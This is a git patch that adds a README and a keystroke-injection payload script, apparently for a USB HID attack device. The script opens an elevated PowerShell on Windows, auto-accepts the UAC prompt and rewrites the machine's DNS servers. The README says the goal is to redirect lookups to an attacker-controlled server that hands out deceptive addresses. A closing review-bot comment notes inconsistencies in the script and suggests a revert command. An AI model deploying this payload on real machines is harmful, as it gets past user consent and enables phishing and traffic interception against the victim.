From 203d986ae4b167a57a0f5cedce136508f7d079bf Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Sat, 2 Nov 2024 14:57:52 +0100
Subject: [PATCH 1/2] Create README.md
---
 .../library/execution/DNS_spoofer/README.md | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 payloads/library/execution/DNS_spoofer/README.md
diff --git a/payloads/library/execution/DNS_spoofer/README.md b/payloads/library/execution/DNS_spoofer/README.md
new file mode 100644
index 0000000..d8e199a
--- /dev/null
+++ b/payloads/library/execution/DNS_spoofer/README.md
@@ -0,0 +1,27 @@
+# Spoof DNS - Windows ✅
+
+DNS Spoofer
+
+## Description
+
+A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
+
+### Settings
+
+* Set the primary and secondary dns servers
+
+## Credits
+
+

Luu176

+
+ + + + +
+ + + +
Github +
+
From 1a1c79d5baed747dc92041a5cdf5672b9a78bc7b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Sat, 2 Nov 2024 14:58:12 +0100
Subject: [PATCH 2/2] Create payload.txt
---
 .../library/execution/DNS_spoofer/payload.txt | 69 +++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 payloads/library/execution/DNS_spoofer/payload.txt
diff --git a/payloads/library/execution/DNS_spoofer/payload.txt b/payloads/library/execution/DNS_spoofer/payload.txt
new file mode 100644
index 0000000..14dd010
--- /dev/null
+++ b/payloads/library/execution/DNS_spoofer/payload.txt
@@ -0,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+ DELAY 150
+ CAPSLOCK
+ $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE
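Review bot: The comment `REM wifi interface should be named: Wi-Fi` contradicts the line directly below it, `DEFINE #interface Ethernet`, so a reader cannot tell which adapter alias the script rewrites. It should read something like `REM #interface must match the adapter alias (default here: Ethernet; wireless adapters are usually Wi-Fi)`. The header also omits that the change is a static setting made from an elevated PowerShell, and that it appears to persist, since nothing in the script restores the previous resolvers. A line such as `REM Revert: Set-DnsClientServerAddress -InterfaceAlias "<alias>" -ResetServerAddresses` would give lab users and responders the cleanup step. The README title ("Spoof DNS") and the payload title ("DNS changer") also differ and should be aligned.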